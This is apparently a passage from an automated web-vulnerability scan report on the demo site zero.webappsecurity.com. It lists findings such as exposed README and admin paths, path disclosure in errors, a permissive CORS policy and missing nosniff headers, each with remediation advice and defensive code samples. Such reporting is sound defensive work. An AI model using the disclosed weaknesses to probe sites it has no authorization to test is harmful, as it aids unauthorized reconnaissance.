operation, then the directory and its contents should be removed or restricted by a server access control mechanism. More
information about implementing access control schemes can be found in the References. Automatic directory indexing should
also be disabled, if applicable.
For Development:
This problem will be resolved by the web application server administrator. In general, do not rely on 'hidden' directories within
the web root that can contain sensitive resources or web applications. Assume an attacker knows about the existence of all
directories and files on your web site, and protect them with proper access controls.
For QA:
This problem will be resolved by the web application server administrator.

Reference
Implementing Basic Authentication in IIS
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/abbca505-6f63-4267-aac11ea89d861eb4.mspx
Implementing Basic Authentication in Apache
http://httpd.apache.org/docs/howto/auth.html#intro

Classifications

CWE-548: Information Leak Through Directory Listing


http://cwe.mitre.org/data/definitions/548.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected File ( 10342 )


Summary
A documentation file was found. The danger in having a documentation file available is that it reveals to attackers what type
of software you are using and often the specific version information, or a location from where the attacker could download the
software itself. Recommendations include removing this file from the production server.

Execution
Open a web browser and navigate to http://zero.webappsecurity.com:80/README.txt.

Implication
The disclosed documentation may aid an attacker in attacking the server and application.

Fix
For Security Operations:
Remove documentation files from all web accessible locations, or restrict access to the files via access control mechanisms.

For Development:
Have Security Operations remove this file from the production server.

For QA:
Have Security Operations remove this file from the production server.

Reference

Classifications

CWE-425: Direct Request ('Forced Browsing')


http://cwe.mitre.org/data/definitions/425.html
CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Poor Error Handling: Unhandled Exception ( 10735 )


Summary
A minor vulnerability has been detected within your web application due to the discovery of a fully qualified path name to the
root of your system. This most often occurs in context of an error being produced by the web application. Fully qualified
server path names allow an attacker to know the file system structure of the web server, which is a baseline for many other
types of attacks to be successful. Recommendations include adopting a consistent error handling scheme and mechanism that
prevents fully qualified path names from being displayed.

Fix
For Development:
Don't display fully qualified pathnames as part of error or informational messages. At the least, fully qualified pathnames can
provide an attacker with important information about the architecture of the web application.
For Security Operations:
The following recommendations will help to ensure that a potential attacker is not deriving valuable information from any error
message that is presented.
Uniform Error Codes: Ensure that you are not inadvertently supplying information to an attacker via the use of
inconsistent or "conflicting" error messages. For instance, don't reveal unintended information by utilizing error messages
such as Access Denied, which will also let an attacker know that the file he seeks actually exists. Have consistent
terminology for files and folders that do exist, do not exist, and which have read access denied.
Informational Error Messages: Ensure that error messages do not reveal too much information. Complete or partial
paths, variable and file names, row and column names in tables, and specific database errors should never be revealed
to the end user. Remember, an attacker will gather as much information as possible, and then add pieces of seemingly
innocuous information together to craft a method of attack.
Proper Error Handling: Utilize generic error pages and error handling logic to inform end users of potential problems. Do
not provide system information or other data that could be utilized by an attacker when orchestrating an attack.
For QA:

In reality, simple testing can usually determine how your web application will react to different input errors. More expansive
testing must be conducted to cause internal errors to gauge the reaction of the site.

The best course of action for QA associates to take is to ensure that the error handling scheme is consistent. Do you receive a
different type of error for a file that does not exist as opposed to a file that does? Are phrases like "Permission Denied" utilized
which could reveal the existence of a file to an attacker? It is often a seemingly innocuous piece of information that provides
an attacker with the means to discover something else which he can then utilize when conducting an attack.

Reference

Classifications

CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Errors
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected Directory ( 10810 )


Summary
A directory named 'admin' was discovered within your web application. Risks associated with an attacker discovering an
administrative directory on your application server typically include the potential for the attacker to use the administrative
applications to affect the operations of the web site. Recommendations include restricting access to important directories or
files by adopting a "need to know" requirement for both the document and server root, and turning off features such as
Automatic Directory Listings that provide information that could be utilized by an attacker when formulating or conducting an
attack.

Implication
Administrative directories typically contain applications capable of changing the configuration of the running software; an
attacker who gains access to an administrative application can drastically affect the operation of the web site.

Fix
For Security Operations:
You should evaluate the production requirements for the found directory. If the directory is not required for production
operation, then the directory and its contents should be removed or restricted by a server access control mechanism. More
information about implementing access control schemes can be found in the References. Automatic directory indexing should
also be disabled, if applicable.
For Development:
This problem will need to be resolved by the web application server administrator. In general, do not rely on 'hidden'
directories within the web root that can contain sensitive resources or web applications. Assume an attacker knows about the
existence of all directories and files on your web site, and protect them with proper access controls.
For QA:
This problem will be resolved by the web application server administrator.

Reference
Implementing Basic Authentication in IIS
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/abbca505-6f63-4267-aac11ea89d861eb4.mspx
Authentication, Authorization and Access Control
http://httpd.apache.org/docs/2.0/howto/auth.html

Classifications

CWE-548: Information Leak Through Directory Listing
http://cwe.mitre.org/data/definitions/548.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

System Information Leak: LDAP Query ( 10842 )


Summary
A possible LDAP query was discovered. This could reveal variable names, path information, and other things of value to a
potential attacker. Recommendations include not hard-coding LDAP query strings in your application code.

Implication
An attacker who discovers an LDAP query string could orchestrate more damaging attacks such as LDAP Injection which could
be utilized to retrieve information from the LDAP server.

Fix
Do not hard code LDAP query strings in your application code.

Reference

Classifications

CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')
http://cwe.mitre.org/data/definitions/90.html
CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Encapsulation
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Poor Error Handling: Server Error Message ( 10932 )


Summary
A server error response was detected. The server could be experiencing errors due to a misbehaving application, a
misconfiguration, or a malicious value sent during the auditing process. While error responses are not dangerous in
themselves, they give attackers insight into how the application handles error conditions. Errors that can be remotely
triggered by an attacker can also potentially lead to a denial of service attack or other more severe vulnerability.
Recommendations include designing and adding consistent error handling mechanisms that are capable of handling any user
input to your web application, providing meaningful detail to end-users, and preventing error messages that might provide
information useful to an attacker from being displayed.

Implication
The server has issued a 500 error response. While the body content of the error page may not expose any information about
the technical error, the fact that an error occurred is confirmed by the 500 status code. Knowing whether certain inputs
trigger a server error can aid or inform an attacker of potential vulnerabilities.

Fix
For Security Operations:
Server error messages, such as "File Protected Against Access", often reveal more information than intended. For instance, an
attacker who receives this message can be relatively certain that the file exists, which might give him the information he
needs to pursue other leads, or to perform an actual exploit. The following recommendations will help to ensure that a
potential attacker is not deriving valuable information from any server error message that is presented.
Uniform Error Codes: Ensure that you are not inadvertently supplying information to an attacker via the use of
inconsistent or "conflicting" error messages. For instance, don't reveal unintended information by utilizing error messages
such as Access Denied, which will also let an attacker know that the file he seeks actually exists. Have consistent
terminology for files and folders that do exist, do not exist, and which have read access denied.
Informational Error Messages: Ensure that error messages do not reveal too much information. Complete or partial
paths, variable and file names, row and column names in tables, and specific database errors should never be revealed
to the end user. Remember, an attacker will gather as much information as possible, and then add pieces of seemingly
innocuous information together to craft a method of attack.
Proper Error Handling: Utilize generic error pages and error handling logic to inform end users of potential problems. Do
not provide system information or other data that could be utilized by an attacker when orchestrating an attack.

Removing Detailed Error Messages

Find instructions for turning off detailed error messaging in IIS at this link:

http://support.microsoft.com/kb/294807

For Development:

From a development perspective, the best method of preventing problems from arising from server error messages is to adopt
secure programming techniques that prevent problems that might arise from an attacker discovering too much information
about the architecture and design of your web application. The following recommendations can be used as a basis for that.

- Stringently define the data type (for instance, a string, an alphanumeric character, etc.) that the application will accept.
- Accept known-good input rather than trying to reject known-bad input. Validate input for improper characters.
- Do not display error messages to the end user that provide information (such as table names) that could be utilized in
  orchestrating an attack.
- Define the allowed set of characters. For instance, if a field is to receive a number, only let that field accept numbers.
- Define the maximum and minimum data lengths for what the application will accept.
- Specify acceptable numeric ranges for input.

For QA:
The best course of action for QA associates to take is to ensure that the error handling scheme is consistent. Do you receive a
different type of error for a file that does not exist as opposed to a file that does? Are phrases like "Permission Denied" utilized
which could reveal the existence of a file to an attacker? Inconsistent methods of dealing with errors give an attacker a very
powerful way of gathering information about your web application.

Reference
Apache:
Security Tips for Server Configuration
Protecting Confidential Documents at Your Site
Securing Apache - Access Control
Microsoft:
How to set required NTFS permissions and user rights for an IIS 5.0 Web server
Default permissions and user rights for IIS 6.0
Description of Microsoft Internet Information Services (IIS) 5.0 and 6.0 status codes

Classifications

CWE-388: Error Handling
http://cwe.mitre.org/data/definitions/388.html
CWE-497: Exposure of System Data to an Unauthorized Control Sphere
http://cwe.mitre.org/data/definitions/497.html
CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Errors
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

HTML5: Overly Permissive CORS Policy ( 11279 )


Summary
A resource on the target website has been found to be shared across websites using CORS with an open access control policy.
Cross-Origin Resource Sharing, commonly referred to as CORS, is a technology that allows a domain to define a policy for its
resources to be accessed by a web page hosted on a different domain using cross domain XML HTTP Requests (XHR).
Historically, the browser restricts cross domain XHR requests to abide by the same origin policy. In its basic form, the same
origin policy sets the script execution scope to the resources available on the current domain and prohibits any communication
to domains outside this scope. While CORS is supported on all major browsers, it also requires that the domain correctly
defines the CORS policy in order to have its resources shared with another domain. These restrictions are managed by access
policies typically included in specialized response headers, such as:
Access-Control-Allow-Origin
Access-Control-Allow-Headers
Access-Control-Allow-Methods
A domain includes the list of domains that are allowed to make cross domain requests to shared resources in the
Access-Control-Allow-Origin header. This header can contain either a list of domains or a wildcard character (*) to allow all
access. Having a wildcard is considered an overly permissive policy.

Implication
An overly permissive CORS policy can allow a malicious application to communicate with the victim application in an
inappropriate way, leading to spoofing, data theft, relay and other attacks. It can open possibilities for entire domain
compromise. For example, let's say a resource is located on a private intranet and a universal access policy is created with
the intent that only other intranet domains can reach it. Subsequently, an internal employee browses to an Internet resource
that includes malicious embedded JavaScript that enumerates the private resource and enables external accessibility,
effectively exposing it to the Internet. If the resource discloses any sensitive information, this attack can quickly escalate into
an unintentional breach of sensitive information.

Fix
Review your Cross-Origin Resource Sharing policy and consider restricting access to only trusted domains. Never use wildcard
open-access permissions (e.g. *) in the Access-Control-Allow-Origin header. Additionally, do not automatically include
Access-Control-Allow-Origin headers in the response unless the request is cross-domain. Alternatively, implement a whitelist of
known domains that are allowed to access this domain and include only the domain that actually tried to access the resource.
Otherwise, reject the request and reply with only the host domain, so that the full list of allowed domains is not exposed.
Reserve the use of CORS for resources that cannot be shared in other ways (e.g. JavaScript can be loaded from other domains
with the SCRIPT tag, and images with the IMG tag). Finally, make sure that this resource does not disclose any sensitive
information, and share only the resources required to preserve functionality rather than granting open CORS access to the
domain.

Example 1:
An example of IIS server configuration for listing domains the application is allowed to communicate with.
<configuration>
  <system.webServer>
    <httpProtocol>
      <customHeaders>
        <!-- Only the listed trusted domain may read this server's responses cross-origin; never use "*" here -->
        <add name="Access-Control-Allow-Origin" value="www.trusted.com" />
      </customHeaders>
    </httpProtocol>
  </system.webServer>
</configuration>
Example 1 shows how to configure CORS headers at the server level; however, the preferred method is to make use of the
API of the language used to develop the application and set access permissions at the resource level.
Here are some programmatic samples by language:

.NET:
Append Header:
// Send the single allowed origin rather than a wildcard
Response.AppendHeader("Access-Control-Allow-Origin", "www.trusted.com");
Check for cross domain XHR request:
// Header names are string keys; both conditions must hold before CORS headers are added
if ((Request.Headers["X-Requested-With"] == "XMLHttpRequest") && (Request.Headers["Origin"] != null))

Java:
// Send the single allowed origin rather than a wildcard
response.addHeader("Access-Control-Allow-Origin", "www.trusted.com");
Check for cross domain XHR request:
// Compare header values with equals(), not ==; calling it on the literal also tolerates a missing header (null)
if ("XMLHttpRequest".equals(request.getHeader("X-Requested-With")) && request.getHeader("Origin") != null)

PHP:
<?php
// Send the single allowed origin rather than a wildcard; header() must be called before any output
header('Access-Control-Allow-Origin: www.trusted.com');
?>
Check for cross domain XHR request:
// PHP exposes request headers as $_SERVER['HTTP_<NAME>']; the Origin header is therefore HTTP_ORIGIN
if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && ($_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest')
    && isset($_SERVER['HTTP_ORIGIN']))

Reference
OWASP HTML 5 Security Cheat Sheet
https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet
Cross-Origin Resource Sharing
http://en.wikipedia.org/wiki/Cross-origin_resource_sharing
http://www.w3.org/TR/cors/
Same Origin Policy
http://en.wikipedia.org/wiki/Same_origin_policy

Classifications

CWE-708: Incorrect Ownership Assignment
http://cwe.mitre.org/data/definitions/708.html
Kingdom: Encapsulation
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Insecure Content-Type Setting ( 11309 )


Summary
Almost all browsers are designed to use a mime sniffing technique to guess the content type of the HTTP response instead of
adhering to the Content-Type specified by the application in specific cases or ignoring the content when no mime type is
specified. Inconsistencies introduced by the mime sniffing techniques could allow attackers to conduct Cross-Site Scripting
attacks or steal sensitive user data. WebInspect has determined that the application fails to instruct the browser to strictly
enforce the Content-Type specification supplied in the response.
Web server misconfiguration can cause an application to send HTTP responses with the missing Content-Type header or
specify a mime type that does not match up accurately with the response content. When a browser receives such a response,
it attempts to programmatically determine the mime type based on the content returned in the response. The mime type
derived by the browser, however, might not accurately match the one intended by the application developer. Such
inconsistencies have historically allowed attackers to conduct Cross-Site Scripting or data theft using Cascading Style Sheets
(CSS) by letting them bypass server-side filters using mime type checking and yet have the malicious payload with misleading
mime type specification executed on the client-side due to the browser mime sniffing policies.
Microsoft Internet Explorer (IE) introduced the X-Content-Type-Options: nosniff specification that application developers can
include in all responses to ensure that mime sniffing does not occur on the client-side. This protection mechanism is limited to
Microsoft Internet Explorer versions 9 and above.

Execution
- Build a test page that includes a reference to an external JavaScript or CSS resource
- Configure the server to return the external resource with an incorrect mime type specification
- Visit the test page using an old version of Microsoft's Internet Explorer (IE 8) browser
- Interpretation of the external content as JavaScript or CSS by the browser despite the misleading mime type specification
  indicates a potential for compromise.

Implication
By failing to dictate the suitable browser interpretation of the response content, application developers can expose their users
to Cross-Site Scripting or information stealing attacks.

Fix
Configure the web server to always send the X-Content-Type-Options: nosniff specification in the response headers. In
addition, ensure that the following safety precautions are also put in place:
- Verify that the web server configuration will send the accurate mime type information in the Content-Type header of each
  HTTP response
- Configure the server to send a default Content-Type of text/plain or application/octet-stream to tackle failure scenarios
- Ensure that an appropriate character set is specified in the Content-Type header
- Configure the server to send Content-Disposition: attachment; filename=name; for content without an explicit content type
  specification.

Reference
Microsoft Internet Explorer:
MIME-Handling Change: X-Content-Type-Options: nosniff
MIME-Handling Changes in Internet Explorer
OWASP:
OWASP Testing Guide Appendix D: Encoded Injection
List of Useful HTTP Headers
CSS Data Theft:
CVE-2010-0654

Classifications

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
http://cwe.mitre.org/data/definitions/79.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Insecure Deployment: Known Application Fingerprint ( 3872 )


Summary
The Ws_ftp.log parser engine will parse any Ws_ftp.log files found within the scan for links to add to the crawler engine.

Fix

Reference

Classifications

Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: OPTIONS HTTP Method ( 10282 )


Summary
The server supports the OPTIONS HTTP method. The OPTIONS method is used to determine what other methods the server
supports for a given URI/resource.

Fix

Reference
RFC 2616 Section 9: HTTP Methods:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html

Apache:
Apache HTTP Server Version 2.0
Apache HTTP Server Version 1.3
Microsoft:
UrlScan Security Tool
How to configure the URLScan Tool
Setting Application Mappings in IIS 6.0

Classifications

CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Compliance Failure: Missing Privacy Policy ( 5546 )


Summary
A privacy policy was not supplied by the web application within the scope of this audit. Many legislative initiatives require that
organizations place a publicly accessible document within their web application that defines their website's privacy policy. As a
general rule, these privacy policies must detail what information an organization collects, the purpose for collecting it,
potential avenues of disclosure, and methods for addressing potential grievances.
Various laws governing privacy policies include the Gramm-Leach-Bliley Act, the Health Insurance Portability and Accountability
Act (HIPAA), the California Online Privacy Protection Act of 2003, the European Union's Data Protection Directive and others.

Execution
All of the web pages accessible within the scope of the scan are sampled for textual content that often constitutes a privacy
policy statement. A violation is reported upon completion of the web application crawl without a successful match against any
of the web pages.
Note that the privacy policy of your application could be located on another host or within a section of the site that was not
configured as part of the scan. To validate, please try to access the privacy policy of your website and check to see if it was
part of the scan.
The content of the following resources requires manual inspection to verify if it comprises the privacy policy statement.
http://zero.webappsecurity.com:80/search.html?searchTerm=12345

Implication
Most privacy laws are created to protect residents who are users of the website. Hence, organizations from any part of the
world must adhere to these laws if they cater to customers residing in these geographical areas. Failing to do so could result
in a lawsuit by the corresponding government against the organization.

Fix
Declare a comprehensive privacy policy for the website, and ensure that it is accessible from every page that seeks personal
information from users. To verify the fix, rescan the site in order to discover and audit the newly added resources.
Descriptions:
Any standard web application privacy policy should include the following components:
- A description of the intended purpose for collecting the data.
- A description of the use of the data.
- Methods for limiting the use and disclosure of the information.
- A list of the types of third parties to whom the information might be disclosed.
- Contact information for inquiries and complaints.

Reference
California Online Privacy Protection Act
http://oag.ca.gov/privacy/COPPA
National Conference of State Legislation
http://www.ncsl.org/issues-research/telecom/state-laws-related-to-internet-privacy.aspx
Gramm-Leach-Bliley Act
http://www.gpo.gov/fdsys/pkg/PLAW-106publ102/pdf/PLAW-106publ102.pdf
Health Insurance Portability and Accountability Act of 1996
https://www.cms.gov/Regulations-and-Guidance/HIPAA-Administrative-Simplification/HIPAAGenInfo/downloads/HIPAALaw.pdf
Health Insurance Portability and Accountability Act of 1996
http://ec.europa.eu/justice/policies/privacy/docs/guide/guide-ukingdom_en.pdf

Classifications

Kingdom: Security Features
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html
CWE-254: Security Features
http://cwe.mitre.org/data/definitions/254.html

Privacy Violation: Autocomplete ( 5597 )


Summary
Most recent browsers have features that will save form field content entered by users and then automatically complete form
entry the next time the fields are encountered. This feature is enabled by default and could leak sensitive information since it
is stored on the hard drive of the user. The risk of this issue is greatly increased if users are accessing the application from a
shared environment. Recommendations include setting autocomplete to "off" on all your forms.

Fix

Reference
Microsoft:
Autocomplete Security

Classifications

CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Security Features
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

HTML5: CORS Functionality Abuse ( 11282 )


Summary
A resource has been discovered that is shared using cross domain access with CORS but could be accessed using more secure
alternatives. For example, JavaScript can be accessed using the SCRIPT tag and, similarly, the IMG tag can be used to access
images and the IFRAME tag can be used to include HTML content.
Cross-Origin Resource Sharing, commonly referred to as CORS, is a technology that allows a domain to define a policy for its
resources to be accessed by a web page hosted on a different domain using cross domain XML HTTP Requests (XHR).
Historically, browsers have restricted XHR requests to abide by the same origin policy. This policy sets the script execution
scope to the resources available on the current domain and prohibits any communication to domains outside this scope.
However, a few HTML tags, such as SCRIPT, IMG, and IFRAME, are exempt from the same origin policy and allow remote
content to be loaded from a different domain. These are more secure alternatives for a site that loads content from a remote
domain, and no special permission or cross-domain policy is required from the hosting domain.
While CORS is supported on all major browsers, it also requires that the domain correctly defines the CORS policy in order to
have its resources shared with another domain. These restrictions are managed by access policies typically communicated in
specialized response headers, such as:
Access-Control-Allow-Origin
Access-Control-Allow-Headers
Access-Control-Allow-Methods
However, caution should be taken when defining these headers, because an overly permissive policy configured at the server
level for a domain, or for a directory on a domain, can expose more content to cross-domain access than intended. CORS can
allow a malicious application to communicate with the victim application in an inappropriate way, leading to information
disclosure, spoofing, data theft, relay or other attacks. Implementing CORS can increase an application's attack surface
tremendously and should be used only when absolutely necessary.

Fix
Revisit the currently implemented CORS policy and restrict sharing to only the types of content that cannot be shared using
alternate mechanisms. In addition, isolate CORS-enabled resources on the web server and create a publicly accessible directory
for sharing JavaScript or image content types. Finally, instead of including the list of all allowed domains in the response
Access-Control-Allow-Origin header, include only the domain trying to access the content.

Reference
OWASP HTML 5 Security Cheat Sheet
https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet
Cross-Origin Resource Sharing
http://en.wikipedia.org/wiki/Cross-origin_resource_sharing
http://www.w3.org/TR/cors/
Same Origin Policy
http://en.wikipedia.org/wiki/Same_origin_policy

Classifications

CWE-227: Improper Fulfillment of API Contract ('API Abuse')
http://cwe.mitre.org/data/definitions/227.html
Kingdom: Encapsulation
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Insecure Content-Type Setting ( 11359 )


Summary
The Content-Type HTTP response header or the HTML meta tag provides a mechanism for the server to specify an
appropriate character encoding for the response content to be rendered in the web browser. Proper specification of the
character encoding through the charset parameter in the Content-Type field reduces the likelihood of misinterpretation of the
characters in the response content and ensures reliable rendering of the web page. Failure to ensure enforcement of the
desired character encoding could result in client-side attacks like Cross-Site Scripting.

Execution
Verify the character set specification on every HTTP response. Character sets can be specified in the HTTP header or in an
HTML meta tag. In the case of an XML response, the character set can be specified along with the XML Declaration.

Implication
In the absence of the character set specification, a user-agent might default to a non-standard character set, or could derive
an incorrect character set based on certain characters in the response content. In some cases, both these approaches can
cause the response to be incorrectly rendered. This may enable other attacks such as Cross-site Scripting.

Fix
Ensure that a suitable character set is specified for every response generated by the web application. This can be done either
by:
- Modifying the code of the web application, which would require all pages to be modified.
- Adding the Content-Type header to the server configuration (recommended). This ensures that the header is added to all
  the responses with minimal development effort.

Reference
DoD Application Security and Development STIG
http://iase.disa.mil/stigs/app_security/app_sec/app_sec.html
UTF-7 encoding used to create XSS attack
http://www.securityfocus.com/archive/1/420001

Classifications

CWE-116: Improper Encoding or Escaping of Output
http://cwe.mitre.org/data/definitions/116.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html
